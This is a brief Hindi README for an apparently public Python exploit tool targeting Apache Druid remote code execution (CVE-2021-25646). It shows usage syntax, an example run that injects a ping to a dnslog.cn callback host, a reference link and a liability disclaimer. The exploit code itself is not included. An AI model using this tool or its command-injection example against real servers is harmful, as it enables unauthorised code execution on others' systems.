
Apache Druid रिमोट कोड एक्ज़ीक्यूशन भेद्यता CVE-2021-25646 के लिए Python एक्सप्लॉइट, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से कमांड इंजेक्शन सक्षम करता है।
j2ekim द्वारा
python exp.py -u [--url] -c [--command]
python cve-2021-25646.py -u http://127.0.0.1:8888 -c "ping 5ap7ta.dnslog.cn"

https://www.adminxe.com/2109.html
इस उपकरण के प्रसार या उपयोग से होने वाले किसी भी प्रत्यक्ष या अप्रत्यक्ष परिणाम या हानि के लिए उपयोगकर्ता स्वयं जिम्मेदार है, लेखक इसके लिए कोई जिम्मेदारी नहीं लेता है।